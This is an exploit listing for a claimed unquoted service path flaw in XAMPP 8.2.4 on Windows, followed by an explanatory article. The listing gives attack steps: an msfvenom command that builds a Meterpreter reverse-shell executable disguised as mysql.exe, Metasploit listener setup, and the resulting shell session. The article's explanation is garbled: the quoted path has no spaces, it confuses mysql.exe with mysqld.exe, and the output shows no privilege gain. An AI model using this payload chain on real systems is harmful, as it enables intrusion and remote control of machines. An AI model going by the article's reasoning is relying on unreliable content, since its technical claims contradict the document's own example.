XAMPP 8.2.4 - Unquoted Path
# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/
Steps to Exploit:
1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell
C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto
// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
Volume in drive C has no label.
Volume Serial Number is 80B5-B405
Directory of C:\xampp\mysql\bin
[...]XAMPP 8.2.4 Unquoted Path Vulnerability: Exploiting Service Executables on Windows
Security vulnerabilities in widely used software platforms like XAMPP can pose significant risks, especially when they involve privilege escalation through unquoted service paths. The XAMPP 8.2.4 version, despite its popularity for local web development, has been identified as susceptible to a critical exploit leveraging an unquoted path in the MySQL service executable.
Understanding the Unquoted Path Vulnerability
On Windows systems, services are configured with executable paths that are often stored in the registry. When these paths are unquoted—meaning they lack surrounding quotation marks—Windows interprets the path as a sequence of commands, allowing attackers to inject malicious executables at the first whitespace. This is particularly dangerous when the path contains spaces, such as:
C:\xampp\mysql\bin\mysqld.exeHere, the path does not include quotes, so if an attacker places a malicious file named mysqld.exe in a directory that precedes the actual path (e.g., C:\xampp\mysql\bin), Windows will attempt to execute the first encountered executable—potentially a malicious payload—before proceeding to the intended one.
Exploitation Steps: From Discovery to Privilege Escalation
The exploit chain begins with identifying services that have unquoted paths and auto-starting behavior. This is done using wmic, a powerful Windows Management Instrumentation tool.
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """This command filters services that:
- Start automatically (
startmode= Auto) - Are not part of the Windows system directory (
c:\windows\) - Have unquoted paths (
findstr /i /v """excludes quoted paths)
From the output, the mysql service appears with an unquoted path:
mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql AutoSince the path contains spaces and lacks quotation marks, an attacker can exploit this by replacing mysqld.exe with a malicious executable.
Creating the Malicious Payload
Using msfvenom, a Metasploit Framework tool, the attacker generates a reverse TCP payload designed to establish a connection back to a listening server:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exeThis command creates an executable named mysql.exe that, when executed, will initiate a meterpreter session to the specified lhost and lport. The payload is crafted to mimic the original mysqld.exe file, allowing it to be placed in the target directory without raising suspicion.
Setting Up the Listener
On the attacker's machine, a reverse handler is configured to receive the incoming connection:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > runUpon execution, the handler listens on 192.168.1.13:4443 and waits for the reverse connection. When the malicious mysql.exe is executed via the service startup, the connection is established.
Exploitation in Practice
After transferring the malicious mysql.exe to the C:\xampp\mysql\bin directory, the attacker simply double-clicks the service or restarts the MySQL service. This triggers the Windows service manager to execute the unquoted path, which now resolves to the malicious executable instead of the original mysqld.exe.
Once the payload executes, the attacker gains a meterpreter session with the privileges of the service account. In this case, the session reveals:
meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724With access to the system, the attacker can:
- Enumerate files and directories
- Execute arbitrary commands
- Access sensitive data (e.g., configuration files, database contents)
- Move laterally within the network
Why This Exploit Works
Windows Service Manager treats unquoted paths as literal strings. When it encounters a space in the path, it assumes the next segment is a separate executable. This behavior is documented in Microsoft’s security advisories and is a well-known vector for privilege escalation.
For example:
| Original Path | Malicious Path | Result |
|---|---|---|
C:\xampp\mysql\bin\mysqld.exe | C:\xampp\mysql\bin\mysql.exe | Executes mysql.exe instead of mysqld.exe |
Even though the original file is still present, the service manager prioritizes the first executable encountered in the path.
Security Implications and Mitigation
This vulnerability highlights a critical flaw in how third-party software like XAMPP configures services. The lack of proper path quoting in service definitions can lead to:
- Privilege escalation
- Remote code execution
- Unauthorized access to sensitive data
- Compromise of development environments
Recommendations for users and administrators:
- Always quote service paths in registry entries, especially when paths contain spaces.
- Regularly audit services using
wmicor PowerShell to detect unquoted paths. - Use tools like
SC.exeto modify service configurations:
sc config mysql binPath= "\"C:\\xampp\\mysql\\bin\\mysqld.exe\" --defaults-file=\"C:\\xampp\\mysql\\bin\\my.ini\""Adding quotation marks around the path prevents exploitation.
Expert Insight: Beyond XAMPP
While this exploit targets XAMPP 8.2.4, similar vulnerabilities exist in other software packages (e.g., Apache, PHP, PostgreSQL installations). The core issue is not specific to XAMPP but rather a design flaw in service configuration practices.
Security professionals should treat unquoted paths as a red flag during system audits. Tools like PowerShell scripts or AutoHotkey can automate detection across multiple services:
Get-WmiObject -Class Win32_Service | Where-Object { $_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike "*""*" }Such automation enables proactive identification and remediation before attackers exploit them.
Conclusion
The XAMPP 8.2.4 unquoted path vulnerability serves as a stark reminder: even popular, trusted tools can harbor critical security flaws. By understanding how unquoted paths enable privilege escalation, administrators can safeguard their systems through proper configuration, continuous monitoring, and timely patching.
Always quote service paths. Always audit. Always secure.